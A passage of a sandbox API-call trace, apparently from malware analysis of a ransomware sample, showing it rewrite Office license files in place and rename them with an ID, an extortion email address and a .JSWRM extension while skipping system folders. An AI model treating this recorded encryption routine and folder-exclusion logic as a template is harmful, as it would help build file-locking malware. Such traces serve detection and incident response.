ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe501ae6b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x679d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTrial-ppd.xrm-ms", cAlternateFileName="MO11F9~1.XRM")) returned 1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.210] lstrcmpiW (lpString1="MondoR_SubTrial-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0104.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0104.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0104.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0104.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.211] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26525) returned 1 [0104.211] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6790) returned 0x24c1d0 [0104.211] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6790, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6790, lpOverlapped=0x0) returned 1 [0104.215] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.215] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6790, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6790, lpOverlapped=0x0) returned 1 [0104.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.215] CloseHandle (hObject=0x45c) returned 1 [0104.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0104.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0104.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0104.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0104.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0104.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0104.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0104.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0104.217] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4e511f7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4e511f7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4f5c29b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTrial-ul-oob.xrm-ms", cAlternateFileName="MO9448~1.XRM")) returned 1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.217] lstrcmpiW (lpString1="MondoR_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0104.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2413d0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0104.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0104.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.218] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0104.218] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0104.218] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0104.220] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.220] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0104.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.221] CloseHandle (hObject=0x45c) returned 1 [0104.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0104.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0104.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0104.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0104.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0104.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0104.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.221] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0104.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0104.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0104.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0104.222] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe565d12b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe565d12b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5741fb4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b93, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTrial2-pl.xrm-ms", cAlternateFileName="MOCBA3~1.XRM")) returned 1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2=".") returned 1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="..") returned 1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="...") returned 1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="windows") returned -1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="recovery") returned -1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.222] lstrcmpiW (lpString1="MondoR_SubTrial2-pl.xrm-ms", lpString2="msocache") returned -1 [0104.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0104.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0104.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0104.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.223] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11155) returned 1 [0104.223] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0104.223] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0104.226] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.226] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0104.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.226] CloseHandle (hObject=0x45c) returned 1 [0104.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0104.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0104.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0104.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0104.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0104.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.226] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0104.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 